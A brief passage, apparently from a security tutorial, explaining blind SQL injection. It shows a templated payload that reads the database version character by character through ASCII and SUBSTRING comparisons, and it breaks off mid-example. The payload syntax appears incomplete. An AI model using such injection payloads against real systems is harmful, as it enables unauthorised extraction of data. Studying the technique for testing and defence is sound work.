Blind SQL injection can be a pain to exploit ... In this example, the attacker is looking to select the database version: vulnerable_parameter'; if(ASCII(SUBSTRING((SELECT @@version LIMIT 1 OFFSET ${row_index}) , ${char_index} ,1))) ${comparator:>}
↧